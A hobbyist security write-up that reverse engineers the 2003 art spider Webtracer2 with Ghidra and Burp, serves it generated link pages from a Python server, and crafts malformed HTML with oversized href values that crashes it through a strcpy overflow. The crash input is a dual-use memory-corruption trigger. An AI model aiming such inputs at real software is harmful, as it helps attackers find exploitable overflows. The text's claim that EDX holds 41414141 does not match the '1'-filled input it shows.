.+:::::::::::::::::::::::::::::::::::::::::/
    .//`+++++++++++++++++++++++++++++++++++++// s
    -+/.h+..................................-os s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h+                                   ss s
    -++-yo////////////////////////////////////y`s
    -+o-:--------------------------::::-:://:---s
    -+/                            :-.: +:oo-   s
    -+/```````````````````````````````````:-````s
    ./o//////////+o:::::::::::::::::s+/////////::
    ``://////////+s:::::::::::::::::y+/////////:.
      s                        .::::/osso::::. .+
    `.y                        +yyyyhNNNmyyyy+ .+
    `:h:::::/+:::::::::::::+:///////////////////+--------------------
     .o                    s s::::::::::::s.+ - +
    -/y     .o             s ::::::::::::oss+::.+
    `-y     .o             y            `+//:  .+
    `.+/y/::/+:::::::::::::+:::::::::::::::::++:.
        `////////////////////////////////////:/.       
    
    
        
hacktracer
    

This article analyzes and hacks the art browser Webtracer2, created by the artist Nullpointer in 2003. He has already described the work on his website, which is linked below. (You might have to open the page in another tab and accept the certificate.) After that, this article goes straight into the analysis.

https://www.nullpointer.co.uk/-/webtracer2.htm

First let's download the webtracer2.zip and unzip it.

The ZIP archive consists of various files. Particularly interesting are the two EXE files: Spider.exe and Visualizer.exe. As the names suggest, one of them spiders a website and the other one visualises the data. Nullpointer also documented and described this in detail on the project's website.

Let's start the analysis with Spider.exe, since it has to run first and offers more interactive functionality. By this I mean that it requests a website we specify. Because we control the response, this opens up lots of possible interactions with Spider.exe.

    Binary Orientation Methods

To start the analysis let's open the exe in Ghidra.

Ghidra is a software reverse engineering tool. It helps examine and understand compiled software code, like executable programs and binaries. With Ghidra, machine code can be decompiled into more readable source code.

The following screenshot shows a method to quickly orientate in the EXE file.

- First we search for strings.

- Then double-click on a string to jump to its location. This is most commonly somewhere in the .rdata section.

- Ghidra then shows the XREF (cross reference) location 01_GET_PAGES:00402c19, which means the string is used somewhere else in the binary.

- Another double-click on the XREF address brings us to the part of the decompiled code where the string is used. In this case it's the function 01_GET_PAGES, which already sounds promising.

Now we have a foothold from which we can continue the analysis. This technique is a powerful way to quickly find relevant parts of the code in large binaries.
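The string search that Ghidra performs can be approximated outside the tool. The following is a minimal sketch, not Ghidra's actual implementation: it scans raw bytes for runs of printable ASCII, similar to the Unix strings utility. The function name extract_strings and the sample bytes are made up for illustration.

```python
import re


def extract_strings(data: bytes, min_len: int = 4):
    """Yield (offset, text) for each run of printable ASCII of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.start(), match.group().decode("ascii")


# Hypothetical sample standing in for a slice of a binary's data section.
sample = b"\x00\x01GETTING PAGE\x00\xff\x10ab\x00InternetOpen() failed\x00"
found = list(extract_strings(sample))

for offset, text in found:
    print(f"{offset:#06x}  {text}")
```

To try it on a real file, pass the result of open("Spider.exe", "rb").read() instead of the sample. Note that the offsets are file offsets, not the virtual addresses Ghidra displays, and that a plain scan like this gives no cross references; those are what make the Ghidra workflow so convenient.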

decompiled code
Find interesting code by XREF strings

In this code we can see that some buffers get created in the beginning and later on functions like strcpy are used.

The official Microsoft documentation gives this warning about the standard C function:

Important: Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead.

This really smells like buffer overflow.
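To illustrate why an unchecked copy is dangerous, here is a small model in Python. It is only a sketch under simplifying assumptions: memory is a flat bytearray, an 8-byte buffer is followed directly by 8 bytes of unrelated data, and the helper unsafe_strcpy is a made-up stand-in that mimics how strcpy copies up to and including the terminating NUL without looking at the destination size.

```python
def unsafe_strcpy(memory: bytearray, dest: int, src: bytes) -> None:
    """Copy src plus a terminating NUL to memory[dest:], ignoring any buffer size."""
    data = src.split(b"\x00", 1)[0] + b"\x00"  # strcpy stops at the first NUL
    memory[dest:dest + len(data)] = data


# An 8-byte buffer at offset 0, followed directly by 8 bytes of other data.
memory = bytearray(b"\x00" * 8 + b"NEIGHBOR")

unsafe_strcpy(memory, 0, b"short")      # fits into the 8-byte buffer
after_short = bytes(memory)

unsafe_strcpy(memory, 0, b"A" * 12)     # 13 bytes written into an 8-byte buffer
after_long = bytes(memory)

print(after_short[8:])  # neighbouring data still intact
print(after_long[8:])   # neighbouring data partly overwritten
```

In a real process the neighbouring bytes could be other variables, saved registers or a return address, which is what makes such a bug potentially exploitable.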



undefined4 __fastcall 01_GET_PAGES(uint param_1)

{
    int iVar1;
    undefined4 uVar2;
    undefined4 auStack1064 [2];
    int iStack1056;
    int iStack1052;
    undefined4 uStack1048;
    char acStack1044 [256];
    undefined auStack788 [256];
    undefined auStack532 [256];
    undefined auStack276 [256];
    int iStack20;
    int iStack16;
    int iStack12;
    uint uStack8;
    
    *(undefined4 *)(param_1 + 4) = 0;
    uStack8 = param_1;
    status_logger("=======================GETTING PAGE========================");
    status_logger(uStack8 + 0x514);
    strncpy(&DAT_012f766c,"not found",9);
    DAT_012f7675 = 0;
    iStack12 = InternetOpenA("webhack",0,0,0,0);
    if (iStack12 == 0) {
        error_logger("InternetOpen() failed");
    }
    uStack1048 = 5000;
    iVar1 = InternetSetOptionA(iStack12,2,&uStack1048,4);
    if (iVar1 == 0) {
        error_logger("InternetConnect() failed");
        InternetCloseHandle(iStack12);
        uVar2 = 0;
    }
    else {
        iVar1 = InternetSetOptionA(iStack12,8,&uStack1048,4);
        if (iVar1 == 0) {
        error_logger("InternetConnect() failed");
        uVar2 = 0;
        }
        else {
        *(undefined4 *)(uStack8 + 0x914) = 0x3c;
        *(undefined **)(uStack8 + 0x918) = auStack276;
        *(undefined4 *)(uStack8 + 0x91c) = 0x100;
        *(undefined **)(uStack8 + 0x924) = auStack532;
        *(undefined4 *)(uStack8 + 0x928) = 0x100;
        *(undefined4 *)(uStack8 + 0x930) = 0;
        *(undefined4 *)(uStack8 + 0x934) = 0;
        *(undefined4 *)(uStack8 + 0x938) = 0;
        *(undefined4 *)(uStack8 + 0x93c) = 0;
        *(undefined **)(uStack8 + 0x940) = auStack788;
        *(undefined4 *)(uStack8 + 0x944) = 0x100;
        *(undefined4 *)(uStack8 + 0x948) = 0;
        *(undefined4 *)(uStack8 + 0x94c) = 0;
        iVar1 = InternetCrackUrlA(uStack8 + 0x514,0,0,uStack8 + 0x914);
        if (iVar1 == 0) {
            error_logger("InternetCrackURL() failed");
            InternetCloseHandle(iStack12);
            uVar2 = 0;
        }
        else {
            strcpy((char *)(uStack8 + 0x614),*(char **)(uStack8 + 0x940));
            strcpy((char *)(uStack8 + 0x414),*(char **)(uStack8 + 0x924));
            if (*(int *)(uStack8 + 0x920) == 3) {
            iStack16 = InternetConnectA(iStack12,auStack532,
                                        uStack8 & 0xffff0000 | (uint)*(ushort *)(uStack8 + 0x92c),0,0,
                                        3,0,0);
            if (iStack16 == 0) {
                error_logger("InternetConnect() failed");
                InternetCloseHandle(iStack12);
                uVar2 = 0;
            }
            else {
                iStack20 = HttpOpenRequestA(iStack16,&DAT_00418784,auStack788,0,0,0,0,0);
                if (iStack20 == 0) {
                error_logger("HttpOpenRequest() failed");
                InternetCloseHandle(iStack12);
                uVar2 = 0;
                }
                else {
                iVar1 = HttpSendRequestA(iStack20,0,0,0,0);
                if (iVar1 == 0) {
                    error_logger("HttpSendRequest() failed:");
                    InternetCloseHandle(iStack12);
                    uVar2 = 0;
                }
                else {
                    auStack1064[0] = 0x100;
                    iVar1 = HttpQueryInfoA(iStack20,0x14,uStack8 + 0x210,auStack1064,0);
                    if (iVar1 == 0) {
                    error_logger("HttpQueryInfo() failed: ");
                    InternetCloseHandle(iStack12);
                    uVar2 = 0;
                    }
                    else {
                    auStack1064[0] = 4;
                    iVar1 = HttpQueryInfoA(iStack20,0x20000013,uStack8 + 0x410,auStack1064,0);
                    if (iVar1 == 0) {
                        error_logger("HttpQueryInfo() failed: Couldn\'t get statusCODE ");
                        InternetCloseHandle(iStack12);
                        uVar2 = 0;
                    }
                    else if (*(int *)(uStack8 + 0x410) == 200) {
                        thunk_FUN_00403280();
                        auStack1064[0] = 100000;
                        iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                        if (iStack1056 == 0) {
                        error_logger("InternetReadFile() failed: didn\'t get page");
                        InternetCloseHandle(iStack12);
                        uVar2 = 0;
                        }
                        else {
                        acStack1044[iStack1052] = '\0';
                        strcpy(&DAT_012f766c,acStack1044);
                        *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                        while (((iStack1052 != 0 && (iStack1052 != 0)) &&
                                (*(int *)(uStack8 + 8) < 0x185a1))) {
                            iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                            acStack1044[iStack1052] = '\0';
                            (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                            strcat(&DAT_012f766c,acStack1044);
                            *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                        }
                        (&DAT_012f766b)[*(int *)(uStack8 + 8)] = 0x78;
                        (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                        InternetCloseHandle(iStack12);
                        status_logger("got page");
                        status_logger(uStack8 + 0x110);
                        uVar2 = 1;
                        }
                    }
                    else {
                        error_logger("File Not Found");
                        InternetCloseHandle(iStack12);
                        uVar2 = 1;
                    }
                    }
                }
                }
            }
            }
            else {
            error_logger("USE HTTP-URL Local-File");
            InternetCloseHandle(iStack12);
            uVar2 = 0;
            }
        }
        }
    }
    return uVar2;
    }
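The block of assignments starting at offset 0x914 appears to fill a URL_COMPONENTSA structure before it is handed to InternetCrackUrlA. This is an interpretation of the decompiled output, not something the binary states. The following sketch models the documented 32-bit layout of that structure with ctypes and prints where each field would land if the structure starts at 0x914. Pointers are replaced by 4-byte integers so the layout is the same on any host, and the class name UrlComponents32 is made up for this example.

```python
import ctypes


class UrlComponents32(ctypes.Structure):
    """32-bit layout of WinINet's URL_COMPONENTSA (pointers modeled as uint32)."""
    _fields_ = [
        ("dwStructSize", ctypes.c_uint32),
        ("lpszScheme", ctypes.c_uint32),
        ("dwSchemeLength", ctypes.c_uint32),
        ("nScheme", ctypes.c_int32),
        ("lpszHostName", ctypes.c_uint32),
        ("dwHostNameLength", ctypes.c_uint32),
        ("nPort", ctypes.c_uint16),  # followed by 2 bytes of padding
        ("lpszUserName", ctypes.c_uint32),
        ("dwUserNameLength", ctypes.c_uint32),
        ("lpszPassword", ctypes.c_uint32),
        ("dwPasswordLength", ctypes.c_uint32),
        ("lpszUrlPath", ctypes.c_uint32),
        ("dwUrlPathLength", ctypes.c_uint32),
        ("lpszExtraInfo", ctypes.c_uint32),
        ("dwExtraInfoLength", ctypes.c_uint32),
    ]


BASE = 0x914  # assumed start of the structure inside the object passed as param_1

offsets = {
    name: BASE + getattr(UrlComponents32, name).offset
    for name, _ in UrlComponents32._fields_
}

print(f"sizeof = {ctypes.sizeof(UrlComponents32):#x}")
for name, address in offsets.items():
    print(f"{address:#x}  {name}")
```

Under this reading, the value 0x3c written to 0x914 is dwStructSize, the three 0x100 values are the lengths of the scheme, host name and URL path buffers, and the comparison of the field at 0x920 with 3 would correspond to INTERNET_SCHEME_HTTP.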
    

Another method to identify interesting parts of the code works similarly. But this time we trace not strings but calls to functions from the imported libraries. Here we use the strcmp function as an example.

- Expand the Symbol Tree in Ghidra on the left and search for interesting function names

- Use the XREF / Cross Reference to navigate to the part of code where the interesting function is used

In other binaries this is a good method to identify a call to a network connection function. First locate the socket connection library function. Then trace it back via the XREFs until a relevant part of the custom code is reached. The custom code where a network connection is initialised is often a good starting point for reversing protocols. It may also be a good spot for a breakpoint in further dynamic analysis with a debugger.

decompiled code
Find interesting code by XREF function calls in libs
    Dynamic Analysis

So far we have peeked into the decompiled source code and browsed a little through the binary. But to get a better impression of the whole picture, let's do some dynamic analysis.

First we proxy the traffic through Burp.

Add "127.0.0.1 hacking.art" to /etc/hosts, you know the game.

Another interesting way to proxy client applications is this tool: https://www.proxifier.com/. It can be useful if the hosts file cannot be used or if various URLs should be requested independently of Burp's proxy forwarding configuration.

Anyways, in the end there is nothing more happening than a simple GET request:


GET / HTTP/1.1
User-Agent: webhack
Host: hacking.art
Connection: close

We can also intercept the response and manually tamper with the HTTP and HTML to provoke some reactions. This is manual and repetitive and most likely gets us nowhere in a reasonable timeframe. Nevertheless, it is good practice and maybe good for a lucky quick win.

To automate more, we can use an approach similar to the fuzzing shown in Weirdstalker. But to find a vulnerability I didn't even need fuzzing.

Before we exploit the program, however, let's have a little fun with it.

I reused my fuzzing code mentioned above and modified it to generate pages for the Spider on the fly. This means the Spider requests up to 1000 pages and all of them have random links.

# load the needed libraries
import socket
import threading
import importlib
import mylib

# prepare the socket to send data via TCP
bind_ip = "0.0.0.0"
bind_port = 80
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this opens a port on the system and waits for a connection from Spider.exe
server.bind((bind_ip,bind_port))
server.listen(5)

# if a client connects:
def handle_client(client_socket):

    importlib.reload(mylib)

    html = mylib.html()

    # receiving whatever the client talks
    request = client_socket.recv(1024)
    print(f"sending {len(html)} bytes")
    # send data (pls crash) and close the connection
    # sendall keeps sending until the whole response is out; send may stop early
    client_socket.sendall(html)
    client_socket.close()

# some multi threaded client handling
while True:
    client,addr = server.accept()
    print(f"[*] Accepted connection from: {addr[0]}:{addr[1]}")
    client_handler = threading.Thread(target=handle_client,args=(client,))
    client_handler.start()

To avoid stopping and starting the script every time we want to change the HTML, we reload the second part as a library at runtime. This allows us to modify the second script while the server is running; the changes are picked up the next time a client, for example a browser, requests a page.
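The reload mechanism can be tried in isolation. The following is a minimal sketch: it writes a throwaway module to a temporary directory, imports it, overwrites the file and reloads it. The module name demo_page and its contents are made up for this demonstration; in the server above the reloaded module is mylib.

```python
import importlib
import pathlib
import sys
import tempfile

# Do not write .pyc files, so the reload always compiles the current source.
sys.dont_write_bytecode = True

with tempfile.TemporaryDirectory() as tmp:
    module_path = pathlib.Path(tmp) / "demo_page.py"
    module_path.write_text("def html():\n    return b'version 1'\n")

    sys.path.insert(0, tmp)
    importlib.invalidate_caches()  # make sure the new file is visible to the importer
    try:
        import demo_page
        first = demo_page.html()

        # Simulate editing the file while the program keeps running.
        module_path.write_text(
            "def html():\n    return b'version 2, edited while running'\n"
        )
        importlib.reload(demo_page)
        second = demo_page.html()
    finally:
        sys.path.remove(tmp)
        sys.modules.pop("demo_page", None)

print(first)
print(second)
```

Calling importlib.reload inside handle_client means the module is re-executed on every connection. That is wasteful for a production server but convenient here, because every request from Spider.exe sees the latest version of the page generator. The second script, mylib.py, looks like this: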

import random
import string
import uuid
from itertools import product
from string import ascii_lowercase, digits

def html():
    html = b"HTTP/1.0 200 OK\r\nServer: tracefun\r\n\r\n"
    html += b"""<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
"""
    html += gentracefun()
    html += b"""
</body>
</html>
    """
    return html


def gentracefun():

    keywords = [''.join(i) for i in product(ascii_lowercase + digits, repeat = 3)]
    linkcounter = 100
    html = b""

    for i in range(0,linkcounter):

        html += f"<a href=\"http://{random.choice(keywords)}\">{random.choice(keywords)}</a>".encode()
        html += b"\n"

    return html

In this case the code generates 100 random links. When Spider.exe requests the page, it follows the links, so in the end a visualisation with 100 dots and lines is generated. But it's also possible to generate more complex pages with nested layers of links and logic that depends on which link is requested. The following code shows an example:

def parseGETparam(request):
    print(f"REQUEST: {request}")
    param = request.split(b"HTTP/")[0].split(b" ")[1][1:]
    print(f"PARAM: {param}")
    return param

def gentracefun1():
    # linkcounter = random.randrange(1, 20)
    linkcounter = 100
    html = b""
    for i in range(0,linkcounter):
        #a = random.choice(string.ascii_letters)
        #b = random.choice(string.ascii_letters)
        #c = random.choice(string.ascii_letters)
        html += f"<a href=\"/{uuid.uuid4()}\">{uuid.uuid4()}</a>".encode()
        html += b"\n"
    return html

def fibonacci_of(n):
    if n in {0, 1}:  # Base case
        return n
    return fibonacci_of(n - 1) + fibonacci_of(n - 2)

fiborange = 25

fibo = [fibonacci_of(n) for n in range(fiborange)]

def gentracefun(request):
    html = b""
    #print(request)
    p = parseGETparam(request)

    try:
        p = int(p)
    except ValueError:
        # not a number (e.g. "/" or a UUID path): serve the index page
        for f in range(len(fibo)):
            html += f"<a href=\"/{f}\">{f}</a>".encode()
            html += b"\n"
        return html

    # fibo only has entries for 0 .. fiborange - 1
    if p < 0 or p >= fiborange:
        return b""

    # page /p links to fibo[p] random pages
    for f in range(fibo[p]):
        html += f"<a href=\"/{uuid.uuid4()}\">{uuid.uuid4()}</a>".encode()
        html += b"\n"

    return html

This results in HTML like the following:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
<a href="/0">0</a>
<a href="/1">1</a>
<a href="/2">2</a>
<a href="/3">3</a>
<a href="/4">4</a>
<a href="/5">5</a>
<a href="/6">6</a>
<a href="/7">7</a>
<a href="/8">8</a>
<a href="/9">9</a>
<a href="/10">10</a>
<a href="/11">11</a>
<a href="/12">12</a>
<a href="/13">13</a>
<a href="/14">14</a>
<a href="/15">15</a>
<a href="/16">16</a>
<a href="/17">17</a>
<a href="/18">18</a>
<a href="/19">19</a>
<a href="/20">20</a>
<a href="/21">21</a>
<a href="/22">22</a>
<a href="/23">23</a>
<a href="/24">24</a>

</body>
</html>

Clicking on one of the links then shows something like the following, with the number of links depending on the number requested:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
<a href="/5c656906-c194-4413-a3d4-bfa1344e7b79">d77d5e6e-69e2-4d69-aa8a-b15f0292ff2a</a>
<a href="/29ba3c28-a0a0-49f5-9a02-a83091fdd82f">7e6f92f5-2054-4ba7-82ba-08818fd77ff3</a>
<a href="/8340eca3-208a-47a5-997a-7157145ed0c3">969520d4-1ffb-4f80-b62a-fa5d62f7176e</a>
<a href="/b8775af9-4a10-4b52-a9c9-d66f8c680b99">075a737b-5fa9-4623-800f-62d5176440ee</a>
<a href="/12642ddf-ef3c-421b-887d-35184ce08c41">c70d9c4b-3ad6-4016-a2ac-0f9dea58c978</a>

</body>
</html>

For Spider.exe this results in quite some work, because the higher Fibonacci numbers generate a lot of links.
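How much work this is can be estimated with a few lines of Python. The sketch below assumes the setup from the listing above: the index page links to pages /0 to /24, and page /n contains as many links as the n-th Fibonacci number. It uses an iterative helper (fibonacci_numbers, a name chosen for this example) instead of the recursive fibonacci_of.

```python
def fibonacci_numbers(count: int) -> list[int]:
    """Return the first `count` Fibonacci numbers iteratively (F0 = 0, F1 = 1)."""
    numbers = []
    a, b = 0, 1
    for _ in range(count):
        numbers.append(a)
        a, b = b, a + b
    return numbers


fiborange = 25
links_per_page = fibonacci_numbers(fiborange)

largest_page = links_per_page[-1]   # number of links on page /24
total_links = sum(links_per_page)   # links on all 25 numbered pages together

print(largest_page)  # 46368
print(total_links)   # 121392
```

So page /24 alone offers tens of thousands of links, far more than the roughly 1000 pages the Spider requests in one run.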

But in the end the Visualiser produces some nice structures from this data.

Fibonacci HTML links visualized
Hundreds of generated linked pages visualized
    Luck Buffer Overflow

Now let's get to the fun part. As mentioned above, in the decompiled code we saw some dangerous functions like strcpy. As long as we follow the common HTML code structure, Spider.exe eats it. Our hundreds of randomly generated links were processed slowly, but they were processed in the end.

So what if we "break" the structure?

There are two possible breaking points. On the one hand the HTTP headers and on the other hand some "experimental" HTML code. Let's try something like the following and hope Spider.exe chokes on something:
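Such test pages do not have to be typed by hand. Here is a minimal sketch of a generator that produces the same kinds of oddities: a long run of spaces inside a tag, an href consisting only of spaces, and an href with a very long host name. The function name build_test_page and the default lengths are assumptions for illustration, not values taken from the original experiment.

```python
def build_test_page(gap: int = 300, href_len: int = 4000) -> bytes:
    """Build an HTML page with one normal link and three oversized ones."""
    links = [
        '<a href="dummy"></a>',                     # well-formed reference link
        f'<a{" " * gap}href="dummy"></a>',          # long gap inside the tag
        f'<a href="{" " * href_len}"></a>',         # href made of spaces only
        f'<a href="http://{"1" * href_len}"></a>',  # very long host name
    ]
    body = "\n".join(links)
    return f"<html>\n<body>\n{body}\n</body>\n</html>\n".encode()


page = build_test_page()
print(f"generated {len(page)} bytes")
```

Combined with the reloadable server from above, the lengths can be changed while Spider.exe is being restarted, which makes it easy to narrow down which input it chokes on. Written out by hand, such a page looks like this: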

    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Test</title>
    </head>
    <body>
    
        <a href="dummy"></a>
        <a                                                                                                                                                                                                                                                                        href="dummy"></a>
        <a href="                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           "></a>
        <a href="http://11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"></a>
        <a href=""2"></a>a
        <a href=="3"></a>
        <a hreasdf="4"></a>
        <aa href="5"></a>
        <a hr ef="6"></a>
        <a href="7 "></a>
        and so on...

And indeed, my very first attempt already worked. The HTML was loaded and the debugger showed an EXCEPTION_ACCESS_VIOLATION: EDX gets overwritten with 41414141 inside the imported library MSVCRTD.DLL. That is something we can work with.

Another way to capture and analyse the crashes of a program is via Windows crash dumps. They have to be enabled in the registry as described here: https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps.
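As a rough sketch of that registry step, the following Python snippet only builds the text of a .reg file that could be imported by hand. The LocalDumps key, DumpType and DumpCount come from the Microsoft page linked above; the per-application subkey for Spider.exe and the chosen values (full dump, ten dumps kept) are assumptions for illustration, not the settings used in this article.

```python
# Sketch: build the text of a .reg file that enables user-mode dumps
# for a single executable. Nothing is written to the registry here.

LOCAL_DUMPS_KEY = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
    r"\Windows Error Reporting\LocalDumps"
)


def build_reg_file(exe_name, dump_type=2, dump_count=10):
    """Return .reg text with per-application LocalDumps settings.

    dump_type 2 requests a full dump, 1 a minidump (assumed choice: 2).
    """
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        f"[{LOCAL_DUMPS_KEY}\\{exe_name}]",
        f'"DumpType"=dword:{dump_type:08x}',
        f'"DumpCount"=dword:{dump_count:08x}',
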